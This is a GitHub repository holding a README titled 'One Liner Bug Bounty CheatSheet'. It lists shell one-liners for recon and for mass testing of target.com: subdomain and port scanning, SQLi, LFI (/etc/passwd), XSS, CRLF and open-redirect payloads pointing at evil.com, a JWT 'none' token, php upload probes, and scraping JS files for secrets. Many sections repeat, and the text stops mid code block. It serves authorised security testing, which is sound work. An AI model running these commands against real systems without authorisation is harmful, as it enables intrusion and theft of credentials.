├── .github
└── FUNDING.yml
├── LICENSE
└── README.md
/.github/FUNDING.yml:
--------------------------------------------------------------------------------
1 | # These are supported funding model platforms
2 |
3 | github: [yogsec]
4 | patreon: # Replace with a single Patreon username
5 | open_collective: # Replace with a single Open Collective username
6 | ko_fi: # Replace with a single Ko-fi username
7 | tidelift: # Replace with a single Tidelift platform-name/package-name e.g., npm/babel
8 | community_bridge: # Replace with a single Community Bridge project-name e.g., cloud-foundry
9 | liberapay: # Replace with a single Liberapay username
10 | issuehunt: # Replace with a single IssueHunt username
11 | lfx_crowdfunding: # Replace with a single LFX Crowdfunding project-name e.g., cloud-foundry
12 | polar: # Replace with a single Polar username
13 | buy_me_a_coffee: # Replace with a single Buy Me a Coffee username
14 | thanks_dev: # Replace with a single thanks.dev username
15 | custom: # Replace with up to 4 custom sponsorship URLs e.g., ['link1', 'link2']
16 |
--------------------------------------------------------------------------------
/LICENSE:
--------------------------------------------------------------------------------
1 | MIT License
2 |
3 | Copyright (c) 2025 YogSec
4 |
5 | Permission is hereby granted, free of charge, to any person obtaining a copy
6 | of this software and associated documentation files (the "Software"), to deal
7 | in the Software without restriction, including without limitation the rights
8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
9 | copies of the Software, and to permit persons to whom the Software is
10 | furnished to do so, subject to the following conditions:
11 |
12 | The above copyright notice and this permission notice shall be included in all
13 | copies or substantial portions of the Software.
14 |
15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
21 | SOFTWARE.
22 |
23 |
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | # One Liner Bug Bounty CheatSheet
2 |
3 |
4 | 
5 |
6 |
7 |
8 |
9 | ## Why OneLiners?
10 |
11 | In the world of bug bounty hunting, time is precious. Short, impactful tips can make all the difference. Here, you'll find quick insights that can easily be referenced when you're diving into a new target, testing a feature, or looking to refine your methodology.
12 |
13 |
36 |
37 |
38 | ---
39 |
40 | ### Misconfigurations, Tech Detection, and Common Bugs
41 | If you want wider coverage, like misconfigurations, tech detection, and common bugs, change the template path to `-t vulnerabilities/`:
42 |
43 | ```bash
44 | cat urls.txt | httpx -silent -mc 200 | nuclei -silent -t vulnerabilities/ -o results.txt
45 | ```
46 |
47 | ### Subdomain Takeovers - Quick Check
48 | Want to check for subdomain takeovers in one line?
49 |
50 | ```bash
51 | subfinder -d example.com | httpx -silent | nuclei -silent -t takeovers/ -o takeover.txt
52 | ```
53 |
54 | ### Subdomain Discovery + Live Check
55 | For subdomain discovery with live check:
56 |
57 | ```bash
58 | subfinder -d target.com | httpx -silent -mc 200
59 | ```
60 |
61 | ### Subdomain Takeover Detection
62 | Detect subdomain takeovers:
63 |
64 | ```bash
65 | subfinder -d target.com | httpx -silent | nuclei -silent -t takeovers/
66 | ```
67 |
68 | ### Directory Bruteforce (Content Discovery)
69 | For directory bruteforce:
70 |
71 | ```bash
72 | ffuf -u https://target.com/FUZZ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -mc 200
73 | ```
74 |
75 | ### Find Open Redirects (Quick Scan)
76 | To quickly find open redirects:
77 |
78 | ```bash
79 | cat urls.txt | gf redirect | httpx -silent
80 | ```
81 |
82 | ### XSS Detection (Using Dalfox)
83 | For XSS detection using Dalfox:
84 |
85 | ```bash
86 | cat urls.txt | dalfox pipe --skip-bav --only-poc
87 | ```
88 |
89 | ### SQL Injection Discovery
90 | For SQL Injection discovery:
91 |
92 | ```bash
93 | cat urls.txt | gf sqli | sqlmap --batch --random-agent -m -
94 | ```
95 |
96 | ### Subdomain Takeovers - Quick Check
97 | Want to check for subdomain takeovers in one line?
98 |
99 | ```bash
100 | subfinder -d example.com | httpx -silent | nuclei -silent -t takeovers/ -o takeover.txt
101 | ```
102 |
103 | ### Subdomain Discovery + Live Check
104 | For subdomain discovery with live check:
105 |
106 | ```bash
107 | subfinder -d target.com | httpx -silent -mc 200
108 | ```
109 |
110 | ### Subdomain Takeover Detection
111 | Detect subdomain takeovers:
112 |
113 | ```bash
114 | subfinder -d target.com | httpx -silent | nuclei -silent -t takeovers/
115 | ```
116 |
117 | ### Directory Bruteforce (Content Discovery)
118 | For directory bruteforce:
119 |
120 | ```bash
121 | ffuf -u https://target.com/FUZZ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -mc 200
122 | ```
123 |
124 | ### Find Open Redirects (Quick Scan)
125 | To quickly find open redirects:
126 |
127 | ```bash
128 | cat urls.txt | gf redirect | httpx -silent
129 | ```
130 |
131 | ### XSS Detection (Using Dalfox)
132 | For XSS detection using Dalfox:
133 |
134 | ```bash
135 | cat urls.txt | dalfox pipe --skip-bav --only-poc
136 | ```
137 |
138 | ### SQL Injection Discovery
139 | For SQL Injection discovery:
140 |
141 | ```bash
142 | cat urls.txt | gf sqli | sqlmap --batch --random-agent -m -
143 | ```
144 |
145 | ### Find Sensitive Files (Backup, Config, etc.)
146 | To find sensitive files like backups and configuration files:
147 |
148 | ```bash
149 | cat urls.txt | waybackurls | grep -Ei '\.(bak|old|backup|log|env|sql|config)$'
150 | ```
151 |
152 | ### CORS Misconfiguration Detection
153 | To detect CORS misconfigurations:
154 |
155 | ```bash
156 | cat urls.txt | corscanner
157 | ```
158 |
159 | ### Detect Technologies + Possible CVEs
160 | To detect technologies and possible CVEs:
161 |
162 | ```bash
163 | cat urls.txt | httpx -silent -title -tech-detect | nuclei -silent -t cves/
164 | ```
165 |
166 | ### Parameter Discovery (for further testing)
167 | To discover parameters for further testing:
168 |
169 | ```bash
170 | cat urls.txt | waybackurls | uro | grep '?'
171 | ```
172 |
173 | ### Full Recon Chain (Subdomains + Live Check + Technologies + Titles)
174 | For full recon chain:
175 |
176 | ```bash
177 | subfinder -d target.com | httpx -silent -title -tech-detect
178 | ```
179 |
180 | ### Subdomain Enum + Ports Scan (Fast)
181 | For a fast subdomain enumeration and port scan:
182 |
183 | ```bash
184 | subfinder -d target.com | naabu -silent -top-ports 1000
185 | ```
186 |
187 | ### All URLs from Wayback, CommonCrawl, and AlienVault
188 | To get all URLs from Wayback, CommonCrawl, and AlienVault:
189 |
190 | ```bash
191 | gau target.com | tee urls.txt
192 | ```
193 |
194 | ### Find Secrets in JS Files
195 | To find secrets in JS files:
196 |
197 | ```bash
198 | cat urls.txt | grep '\.js$' | httpx -silent | xargs -I{} bash -c 'curl -s {} | tr "[:space:]" "\n" | grep -Ei "(api|key|token|secret|password|passwd|authorization)="'
199 | ```
200 |
201 | ### Find Open AWS Buckets
202 | To find open AWS buckets:
203 |
204 | ```bash
205 | subfinder -d target.com | httpx -silent | nuclei -silent -t s3-detect.yaml
206 | ```
207 |
208 | ### Find Misconfigured Login Panels
209 | To find misconfigured login panels:
210 |
211 | ```bash
212 | cat urls.txt | nuclei -silent -t exposed-panels/
213 | ```
214 |
215 | ### Check All Parameters for Reflected XSS
216 | To check all parameters for reflected XSS:
217 |
218 | ```bash
219 | cat urls.txt | gf xss | dalfox pipe --skip-bav --only-poc
220 | ```
221 |
222 | ### Check for Exposed Git Repositories
223 | To check for exposed Git repositories:
224 |
225 | ```bash
226 | cat urls.txt | httpx -silent -path "/.git/config" -mc 200
227 | ```
228 |
229 | ### Extract All Parameters from URLs (for manual testing)
230 | To extract all parameters from URLs for manual testing:
231 |
232 | ```bash
233 | cat urls.txt | uro | grep '?'
234 | ```
235 |
236 | ### Takeover Domains from Subdomain List
237 | To perform takeover checks on domains from a subdomain list:
238 |
239 | ```bash
240 | cat subdomains.txt | nuclei -silent -t takeovers/
241 | ```
242 |
243 | ### Find CVEs Based on Technology
244 | To find CVEs based on technology:
245 |
246 | ```bash
247 | cat urls.txt | httpx -silent -title -tech-detect | nuclei -silent -t cves/
248 | ```
249 |
250 | ### Find Top Ports + Services for All Subdomains (Recon + Port Scan)
251 | To find the top ports and services for all subdomains:
252 |
253 | ```bash
254 | subfinder -d target.com | naabu -top-ports 1000 -silent
255 | ```
256 |
257 | ### Extract All Endpoints from JS Files (JS Analysis)
258 | To extract all endpoints from JS files for analysis:
259 |
260 | ```bash
261 | cat urls.txt | grep '\.js$' | httpx -silent | xargs -I{} bash -c 'curl -s {} | grep -oE "(/api/v[0-9]+/[^\"'\'']+|/[a-zA-Z0-9_/.-]+\.(php|aspx|jsp|html|json|xml|txt))"'
262 | ```
263 |
264 | ### Subdomain Discovery + Live Check
265 | For subdomain discovery with live check:
266 |
267 | ```bash
268 | subfinder -d target.com | httpx -silent -mc 200
269 | ```
270 |
271 | ### Subdomain Takeover Detection
272 | Detect subdomain takeovers:
273 |
274 | ```bash
275 | subfinder -d target.com | httpx -silent | nuclei -silent -t takeovers/
276 | ```
277 |
278 | ### Directory Bruteforce (Content Discovery)
279 | For directory bruteforce:
280 |
281 | ```bash
282 | ffuf -u https://target.com/FUZZ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -mc 200
283 | ```
284 |
285 | ### Find Open Redirects (Quick Scan)
286 | To quickly find open redirects:
287 |
288 | ```bash
289 | cat urls.txt | gf redirect | httpx -silent
290 | ```
291 |
292 | ### XSS Detection (Using Dalfox)
293 | For XSS detection using Dalfox:
294 |
295 | ```bash
296 | cat urls.txt | dalfox pipe --skip-bav --only-poc
297 | ```
298 |
299 | ### SQL Injection Discovery
300 | For SQL Injection discovery:
301 |
302 | ```bash
303 | cat urls.txt | gf sqli | sqlmap --batch --random-agent -m -
304 | ```
305 |
306 | ### Find Sensitive Files (Backup, Config, etc.)
307 | To find sensitive files like backups and configuration files:
308 |
309 | ```bash
310 | cat urls.txt | waybackurls | grep -Ei '\.(bak|old|backup|log|env|sql|config)$'
311 | ```
312 |
313 | ### CORS Misconfiguration Detection
314 | To detect CORS misconfigurations:
315 |
316 | ```bash
317 | cat urls.txt | corscanner
318 | ```
319 |
320 | ### Detect Technologies + Possible CVEs
321 | To detect technologies and possible CVEs:
322 |
323 | ```bash
324 | cat urls.txt | httpx -silent -title -tech-detect | nuclei -silent -t cves/
325 | ```
326 |
327 | ### Parameter Discovery (for further testing)
328 | To discover parameters for further testing:
329 |
330 | ```bash
331 | cat urls.txt | waybackurls | uro | grep '?'
332 | ```
333 |
334 | ### Full Recon Chain (Subdomains + Live Check + Technologies + Titles)
335 | For full recon chain:
336 |
337 | ```bash
338 | subfinder -d target.com | httpx -silent -title -tech-detect
339 | ```
340 |
341 | ### Subdomain Enum + Ports Scan (Fast)
342 | For a fast subdomain enumeration and port scan:
343 |
344 | ```bash
345 | subfinder -d target.com | naabu -silent -top-ports 1000
346 | ```
347 |
348 | ### All URLs from Wayback, CommonCrawl, and AlienVault
349 | To get all URLs from Wayback, CommonCrawl, and AlienVault:
350 |
351 | ```bash
352 | gau target.com | tee urls.txt
353 | ```
354 |
355 | ### Find Secrets in JS Files
356 | To find secrets in JS files:
357 |
358 | ```bash
359 | cat urls.txt | grep '\.js$' | httpx -silent | xargs -I{} bash -c 'curl -s {} | tr "[:space:]" "\n" | grep -Ei "(api|key|token|secret|password|passwd|authorization)="'
360 | ```
361 |
362 | ### Find Open AWS Buckets
363 | To find open AWS buckets:
364 |
365 | ```bash
366 | subfinder -d target.com | httpx -silent | nuclei -silent -t s3-detect.yaml
367 | ```
368 |
369 | ### Find Misconfigured Login Panels
370 | To find misconfigured login panels:
371 |
372 | ```bash
373 | cat urls.txt | nuclei -silent -t exposed-panels/
374 | ```
375 |
376 | ### Check All Parameters for Reflected XSS
377 | To check all parameters for reflected XSS:
378 |
379 | ```bash
380 | cat urls.txt | gf xss | dalfox pipe --skip-bav --only-poc
381 | ```
382 |
383 | ### Check for Exposed Git Repositories
384 | To check for exposed Git repositories:
385 |
386 | ```bash
387 | cat urls.txt | httpx -silent -path "/.git/config" -mc 200
388 | ```
389 |
390 | ### Extract All Parameters from URLs (for manual testing)
391 | To extract all parameters from URLs for manual testing:
392 |
393 | ```bash
394 | cat urls.txt | uro | grep '?'
395 | ```
396 |
397 | ### Takeover Domains from Subdomain List
398 | To perform takeover checks on domains from a subdomain list:
399 |
400 | ```bash
401 | cat subdomains.txt | nuclei -silent -t takeovers/
402 | ```
403 |
404 | ### Find CVEs Based on Technology
405 | To find CVEs based on technology:
406 |
407 | ```bash
408 | cat urls.txt | httpx -silent -title -tech-detect | nuclei -silent -t cves/
409 | ```
410 |
411 | ### Find Top Ports + Services for All Subdomains (Recon + Port Scan)
412 | To find the top ports and services for all subdomains:
413 |
414 | ```bash
415 | subfinder -d target.com | naabu -top-ports 1000 -silent
416 | ```
417 |
418 | ### Extract All Endpoints from JS Files (JS Analysis)
419 | To extract all endpoints from JS files for analysis:
420 |
421 | ```bash
422 | cat urls.txt | grep '\.js$' | httpx -silent | xargs -I{} bash -c 'curl -s {} | grep -oE "(/api/v[0-9]+/[^\"'\'']+|/[a-zA-Z0-9_/.-]+\.(php|aspx|jsp|html|json|xml|txt))"'
423 | ```
424 |
425 | ### Scan for Backup Files (Old Config/DB Dumps)
426 | To scan for backup files, old config, or DB dumps:
427 |
428 | ```bash
429 | cat urls.txt | httpx -silent -path-list <(echo -e "/.env\n/config.php\n/backup.zip\n/database.sql\n/admin.bak") -mc 200
430 | ```
431 |
432 | ### Find Open .git Folders (Source Leak)
433 | To find open `.git` folders:
434 |
435 | ```bash
436 | cat subdomains.txt | httpx -silent -path "/.git/config" -mc 200
437 | ```
438 |
439 | ### WordPress Scan (Detect Plugins, Themes, etc.)
440 | For WordPress scan to detect plugins, themes, etc.:
441 |
442 | ```bash
443 | cat urls.txt | nuclei -silent -t technologies/wordpress/
444 | ```
445 |
446 | ### Hunt for CRLF Injection (Newline Injection)
447 | To hunt for CRLF injection:
448 |
449 | ```bash
450 | cat urls.txt | gf crlf | qsreplace '%0d%0aTestHeader:TestValue' | httpx -silent -hdrs
451 | ```
452 |
453 | ### Detect CORS Misconfigurations (Very Common Bug)
454 | To detect CORS misconfigurations:
455 |
456 | ```bash
457 | cat urls.txt | corscanner
458 | ```
459 |
460 | ### Test All URLs for LFI (Local File Inclusion)
461 | To test all URLs for LFI:
462 |
463 | ```bash
464 | cat urls.txt | gf lfi | qsreplace '/etc/passwd' | httpx -silent -mc 200
465 | ```
466 |
467 | ### Find Information Disclosure via Backup Files
468 | To find information disclosure via backup files:
469 |
470 | ```bash
471 | cat urls.txt | waybackurls | grep -Ei '\.(bak|old|backup|log|sql|env|zip|tar|gz|rar)$' | httpx -silent -mc 200
472 | ```
473 |
474 | ### Find Exposed Panels (Admin, Login, etc.)
475 | To find exposed admin/login panels:
476 |
477 | ```bash
478 | cat urls.txt | nuclei -silent -t exposed-panels/
479 | ```
480 |
481 | ### Full JS Hunting + Secrets Scan (for frontend leaks)
482 | For full JS hunting and secrets scan:
483 |
484 | ```bash
485 | gau target.com | grep '\.js$' | httpx -silent | xargs -I{} bash -c 'echo {} && curl -s {} | tr -d "\r" | grep -E -i "(api[_-]?key|secret|token|auth|password|passwd|client[_-]?id|client[_-]?secret)="'
486 | ```
487 |
488 | ### Search for Open Redirects (URL Redirect issues)
489 | To search for open redirects:
490 |
491 | ```bash
492 | cat urls.txt | gf redirect | qsreplace 'https://evil.com' | httpx -silent -mc 302,301 -fr 'evil.com'
493 | ```
494 |
495 | ### Quick Scan for SQL Injection
496 | For a quick SQL injection scan:
497 |
498 | ```bash
499 | cat urls.txt | gf sqli | sqlmap --batch --random-agent -m -
500 | ```
501 |
502 | ### Find Interesting Endpoints (Like admin, login, debug, etc.)
503 | To find interesting endpoints like admin, login, debug, etc.:
504 |
505 | ```bash
506 | gau target.com | grep -Ei '/(admin|login|debug|test|backup|panel|dashboard)'
507 | ```
508 |
509 | ### Check for Exposed Config Files (like .env, .git, .DS_Store)
510 | To check for exposed config files:
511 |
512 | ```bash
513 | cat urls.txt | httpx -silent -path-list <(echo -e '/.env\n/.git/config\n/.DS_Store\n/config.php\n/config.json') -mc 200
514 | ```
515 |
516 | ### Scan for CVE in All Subdomains
517 | To scan for CVEs in all subdomains:
518 |
519 | ```bash
520 | subfinder -d target.com | httpx -silent | nuclei -silent -t cves/
521 | ```
522 |
523 | ### Full Backup File Search (All extensions that leak data)
524 | To search for all extensions that leak backup files:
525 |
526 | ```bash
527 | gau target.com | grep -Ei '\.(bak|old|backup|sql|log|tar|zip|gz|rar|swp|env|config)$' | httpx -silent -mc 200
528 | ```
529 |
530 | ### Check for CORS Misconfigurations
531 | To check for CORS misconfigurations:
532 |
533 | ```bash
534 | cat urls.txt | corscanner
535 | ```
536 |
537 | ### Scan for Open Admin Panels (Exposed Panels)
538 | ```bash
539 | cat urls.txt | nuclei -silent -t exposed-panels/
540 | ```
541 |
542 | ### ALL-IN-ONE MEGA SCAN 💣 (Subdomain + Alive + CVE Scan + Panels)
543 | ```bash
544 | subfinder -d target.com | httpx -silent -mc 200 | tee alive.txt | nuclei -silent -t cves/,exposed-panels/
545 | ```
546 |
547 | ### All-in-One Recon Pipeline (Subdomains → Probing → Ports → Tech Detection → Titles)
548 | ```bash
549 | subfinder -d target.com | anew subs.txt && cat subs.txt | httpx -silent -title -tech-detect -ports 80,443,8080,8443 | anew alive.txt
550 | ```
551 |
552 | ### Mass Fetch JS Files + Find Secrets + Endpoints + Tokens
553 | ```bash
554 | cat alive.txt | hakrawler -subs | grep '\.js$' | anew jsfiles.txt && cat jsfiles.txt | xargs -I{} bash -c 'curl -s {} | tr -d "\r" | egrep -i "(api|key|token|secret|password|passwd|authorization|bearer|client_id|client_secret)"' | tee secrets.txt
555 | ```
556 |
557 | ### Check for Open Redirects Across All Params (with Payload Injection)
558 | ```bash
559 | cat alive.txt | gf redirect | qsreplace 'https://evil.com' | httpx -silent -fr 'evil.com' -mc 302,301
560 | ```
561 |
562 | ### Automatic Vulnerability Scan (Subdomains to CVE Detection + Misconfigs)
563 | ```bash
564 | subfinder -d target.com | httpx -silent | nuclei -silent -t cves/,misconfiguration/
565 | ```
566 |
567 | ### Backup Files Bruteforce Across All Hosts
568 | ```bash
569 | cat alive.txt | httpx -silent -path-list <(echo -e "/.git/config\n/.env\n/database.sql\n/backup.zip\n/config.php\n/wp-config.php") -mc 200 | tee backups.txt
570 | ```
571 |
572 | ### Check for Parameter-Based XSS (Direct Injection Testing)
573 | ```bash
574 | cat alive.txt | hakrawler -subs -depth 2 | gf xss | qsreplace '">' | httpx -silent -fr 'alert(document.domain)'
575 | ```
576 |
577 | ### Automated LFI Discovery (Common Payloads)
578 | ```bash
579 | cat alive.txt | gf lfi | qsreplace '../../../../../../etc/passwd' | httpx -silent -mc 200
580 | ```
581 |
582 | ### Fuzz Parameters & Check Reflections (for XSS & Injection Discovery)
583 | ```bash
584 | cat alive.txt | waybackurls | gf params | uro | qsreplace FUZZ | ffuf -u FUZZ -w wordlists/payloads/xss.txt -fr 'FUZZ'
585 | ```
586 |
587 | ### Subdomain Takeover Detection (Live Scan + Detection)
588 | ```bash
589 | subfinder -d target.com | httpx -silent | nuclei -silent -t takeovers/
590 | ```
591 |
592 | ### Full Asset Discovery + Technology Analysis + Title Collection
593 | ```bash
594 | assetfinder --subs-only target.com | httpx -silent -title -tech-detect | tee assets_with_tech.txt
595 | ```
596 |
597 | ### Mega Pipeline - Subdomains → URLs → Parameters → XSS/SQL/Secrets
598 | ```bash
599 | subfinder -d target.com | anew subs.txt && cat subs.txt | httpx -silent | hakrawler -subs -depth 2 | anew urls.txt && cat urls.txt | gf xss | dalfox pipe --skip-bav --only-poc | tee xss_poc.txt && cat urls.txt | grep '\.js$' | xargs -I{} bash -c 'curl -s {} | egrep -i "(api|key|token|secret|password|passwd|auth)"' | tee secrets.txt
600 | ```
601 |
602 | ### Ultimate Recon Monster (Subdomains → Probing → Ports → Technologies → CVEs)
603 | ```bash
604 | subfinder -d target.com | httpx -silent -title -tech-detect -ports 80,443,8080,8443 | tee tech_scan.txt && cat tech_scan.txt | nuclei -silent -t cves/
605 | ```
606 |
607 | ### Automated Asset Hunting + JS Analysis + Secret Finder
608 | ```bash
609 | subfinder -d target.com | httpx -silent -mc 200 | hakrawler -subs -depth 3 -plain | anew urls.txt && cat urls.txt | grep '\.js$' | xargs -I{} bash -c 'curl -s {} | tr -d "\r" | gf secrets | tee -a secrets.txt'
610 | ```
611 |
612 | ### Mass Fuzz Every Parameter with XSS, LFI, SQLi Payloads (Ultimate Param Attacker)
613 | ```bash
614 | cat urls.txt | gf xss,lfi,sqli | uro | qsreplace FUZZ | ffuf -u FUZZ -w xss.txt,lfi.txt,sqli.txt -fr "FUZZ" | tee param_fuzz.txt
615 | ```
616 |
617 | ### Subdomain Takeover, DNS Hijack, Misconfig Scan - All In One
618 | ```bash
619 | subfinder -d target.com | dnsx -a -resp-only -silent | nuclei -silent -t takeovers/,dns/
620 | ```
621 |
622 | ### Automatic Full Backup File Bruteforcing Across All Hosts (Super Leaks Finder)
623 | ```bash
624 | subfinder -d target.com | httpx -silent | anew alive.txt && cat alive.txt | httpx -silent -path-list <(curl -s https://raw.githubusercontent.com/danielmiessler/SecLists/master/Discovery/Web-Content/backup.txt) -mc 200 | tee backups_found.txt
625 | ```
626 |
627 | ### Deep Directory Brute Force (Smart Recursive Finder)
628 | ```bash
629 | subfinder -d target.com | httpx -silent | anew alive.txt && cat alive.txt | xargs -I{} gobuster dir -u {} -w big_wordlist.txt -t 50 -o gobuster_output.txt
630 | ```
631 |
632 | ### Blind SSRF Auto-Detection in All Parameters
633 | ```bash
634 | cat urls.txt | gf ssrf | qsreplace 'http://canarytoken.com' | httpx -silent -mc 200 -fr 'canarytoken'
635 | ```
636 |
637 | ### Mega Wordlist Generator from Wayback + JS + HTML Comments + Robots.txt + Sitemap.xml
638 | ```bash
639 | subfinder -d target.com | httpx -silent | anew alive.txt && cat alive.txt | hakrawler -subs -depth 2 | anew urls.txt && cat urls.txt | gf wordlist | anew wordlist.txt
640 | ```
641 |
642 | ### Full Sitemap & Robots Extraction Across Subdomains
643 | ```bash
644 | subfinder -d target.com | httpx -silent -path-list <(echo -e "/robots.txt\n/sitemap.xml") -mc 200 | tee robots_sitemaps.txt
645 | ```
646 |
647 | ### CRLF Injection Full Auto Discovery & Exploit
648 | ```bash
649 | cat urls.txt | gf crlf | qsreplace '%0d%0aTest-Header: InjectedValue' | httpx -silent -hdrs | tee crlf_vulns.txt
650 | ```
651 |
652 | ### CSP Analyzer Across All Hosts (Misconfig Finder)
653 | ```bash
654 | cat alive.txt | httpx -silent -path / -mc 200 -hdrs | grep -i 'content-security-policy' | tee csp_misconfig.txt
655 | ```
656 |
657 | ### Full JS Endpoint Extraction + Sensitive Function Search (eval, document.write, etc.)
658 | ```bash
659 | cat urls.txt | grep '\.js$' | xargs -I{} bash -c 'curl -s {} | grep -E -o "(http|https)://[^\" ]+" | anew js_endpoints.txt && curl -s {} | egrep -i "(document\.write|eval|innerHTML|fetch|XMLHttpRequest|localStorage|sessionStorage|cookie)" | tee -a sensitive_js.txt'
660 | ```
661 |
662 | ### Recon + Full Vuln Scan + CORS, Headers, CVE, Misconfig, Secrets — One Command to Rule Them All
663 | ```bash
664 | subfinder -d target.com | httpx -silent -title -tech-detect -ports 80,443,8080,8443 | tee alive.txt && cat alive.txt | nuclei -silent -t cves/,misconfiguration/,exposures/,default-logins/,panels/ | tee findings.txt && cat alive.txt | hakrawler -subs -depth 3 | anew urls.txt && cat urls.txt | gf xss,sqli,lfi,ssrf | dalfox pipe --skip-bav --only-poc | tee vulns.txt && cat urls.txt | grep '\.js$' | xargs -I{} bash -c 'curl -s {} | tr -d "\r" | gf secrets' | tee secrets_found.txt
665 | ```
666 |
667 | ### Subdomain Takeover + Open Redirect Chain (Full Passive → Exploit Ready)
668 | ```bash
669 | subfinder -d target.com | httpx -silent | nuclei -silent -t takeovers/,redirect/ -o takeover_redirects.txt
670 | ```
671 |
672 | ### Full Parameter Discovery + Automated Fuzzing (XSS, SQLi, LFI, SSRF)
673 | ```bash
674 | gau target.com | gf xss,lfi,sqli,ssrf | qsreplace FUZZ | ffuf -u FUZZ -w payloads/xss.txt,payloads/lfi.txt,payloads/sqli.txt,payloads/ssrf.txt -fr "FUZZ" | tee param_vulns.txt
675 | ```
676 |
677 | ### Auto Search for Backup Files + Leaked Configs (All Subdomains)
678 | ```bash
679 | subfinder -d target.com | httpx -silent -path-list <(curl -s https://raw.githubusercontent.com/danielmiessler/SecLists/master/Discovery/Web-Content/backup.txt) -mc 200 | tee backup_leaks.txt
680 | ```
681 |
682 | ### Deep Web Archive Scraping + JS Secrets Extraction
683 | ```bash
684 | gau --subs target.com | grep '\.js$' | httpx -silent -status-code -mc 200 | xargs -I{} bash -c 'curl -s {} | gf secrets' | tee js_secrets.txt
685 | ```
686 |
687 | ### Auto-Dump All Endpoints from Wayback, JS, Robots.txt, Sitemap.xml
688 | ```bash
689 | subfinder -d target.com | anew subs.txt && cat subs.txt | httpx -silent -path-list <(echo -e "/robots.txt\n/sitemap.xml") -mc 200 | hakrawler -subs -depth 3 | anew all_urls.txt
690 | ```
691 |
692 | ### CSP Bypass Finder (Auto Fetch CSP Across All Subdomains)
693 | ```bash
694 | subfinder -d target.com | httpx -silent -path / -mc 200 -hdrs | grep -i 'content-security-policy' | tee csp_policies.txt
695 | ```
696 |
697 | ### Automatic SSRF Detection (Using Collaborator/Canarytokens)
698 | ```bash
699 | gau target.com | gf ssrf | qsreplace 'http://your-collaborator-url.burpcollaborator.net' | httpx -silent
700 | ```
701 |
702 | ### Deep Search for Hidden Panels + Config Pages (Across All Ports)
703 | ```bash
704 | subfinder -d target.com | httpx -silent -ports 80,443,8080,8443 | nuclei -silent -t panels/,exposures/configs/ -o exposed_panels.txt
705 | ```
706 |
707 | ### Entire Subdomain + Tech Stack + CVE + Misconfig Scan (Full Recon Bomb)
708 | ```bash
709 | subfinder -d target.com | httpx -silent -title -tech-detect -ports 80,443,8080,8443 | nuclei -silent -t cves/,misconfiguration/ -o full_scan.txt
710 | ```
711 |
712 | ### Auto-Scrape HTML Comments for Sensitive Info
713 | ```bash
714 | cat all_urls.txt | httpx -silent -mc 200 -fr 'text/html' -body | grep -iE "" | tee html_comments.txt
715 | ```
716 |
717 | ### URL Extraction from JS Files (Full Recursive)
718 | ```bash
719 | cat all_urls.txt | grep '\.js$' | xargs -I{} bash -c 'curl -s {} | grep -Eo "(https?|ftp)://[a-zA-Z0-9./?=_-]*"' | anew extracted_urls.txt
720 | ```
721 |
722 | ### Super Bruteforce for Backup + Git + Env + SQL Dumps
723 | ```bash
724 | subfinder -d target.com | httpx -silent -path-list <(echo -e "/.git/\n/.env\n/database.sql\n/backup.zip\n/config.yml") -mc 200 | tee sensitive_files.txt
725 | ```
726 |
727 | ### Advanced Open Redirect Scanner Across All Params
728 | ```bash
729 | cat all_urls.txt | gf redirect | qsreplace 'https://evil.com' | httpx -silent -fr 'evil.com' -o open_redirects.txt
730 | ```
731 |
732 | ### Full Headers Security Misconfig Audit
733 | ```bash
734 | subfinder -d target.com | httpx -silent -path / -mc 200 -hdrs | nuclei -silent -t misconfiguration/http-headers/ -o header_issues.txt
735 | ```
736 |
737 | ### Auto-Gather All IPs, ASN, WHOIS for Every Subdomain
738 | ```bash
739 | subfinder -d target.com | dnsx -a -resp-only | anew all_ips.txt && cat all_ips.txt | xargs -I{} sh -c 'whois {} | grep -iE "OrgName|NetName|CIDR"' | tee whois_lookup.txt
740 | ```
741 |
742 | ### Master Recon + Scan Pipeline (One-Liner)
743 | ```bash
744 | subfinder -d target.com | tee subs.txt && cat subs.txt | httpx -silent -title -tech-detect -ports 80,443,8080,8443 | tee tech_info.txt && cat subs.txt | hakrawler -subs -depth 3 | anew urls.txt && cat urls.txt | nuclei -silent -t cves/,misconfiguration/,takeovers/,panels/,redirect/ -o nuclei_findings.txt && cat urls.txt | gf xss,sqli,lfi,ssrf,redirect | qsreplace FUZZ | ffuf -u FUZZ -w payloads/xss.txt,payloads/sqli.txt,payloads/lfi.txt,payloads/ssrf.txt -fr "FUZZ" | tee param_scan.txt
745 | ```
746 |
747 | ### Additional Specific Recon + Vulnerability Scanning Commands
748 |
749 | #### Directory Traversal (Across All Endpoints)
750 | ```bash
751 | cat all_urls.txt | gf lfi | qsreplace '../../../../../etc/passwd' | httpx -silent -fr 'root:x' -o traversal_hits.txt
752 | ```
753 |
754 | #### Exposed Git Repos Finder (Automated)
755 | ```bash
756 | subfinder -d target.com | httpx -silent -path /.git/HEAD -mc 200 -o exposed_git.txt
757 | ```
758 |
759 | #### IDOR Discovery (Bruteforce Parameter Tampering)
760 | ```bash
761 | cat all_urls.txt | gf idor | qsreplace 'id=123' | anew idor_urls.txt && qsreplace 'id=124' | httpx -silent -mc 200 -o possible_idor.txt
762 | ```
763 |
764 | #### JWT Token Misconfig (None Algorithm)
765 | ```bash
766 | cat all_urls.txt | grep -Ei 'jwt|token' | qsreplace 'eyJhbGciOiJub25lIn0.eyJ1c2VyIjoiYWRtaW4ifQ.' | httpx -silent -mc 200 -o jwt_none.txt
767 | ```
768 |
769 | #### Unrestricted File Upload (Testing Common Upload Points)
770 | ```bash
771 | cat all_urls.txt | gf upload | qsreplace 'file=payload.php' | httpx -silent -upload-file payload.php -o upload_findings.txt
772 | ```
773 |
774 | #### Path Confusion + Overlays (Detect Double Extensions)
775 | ```bash
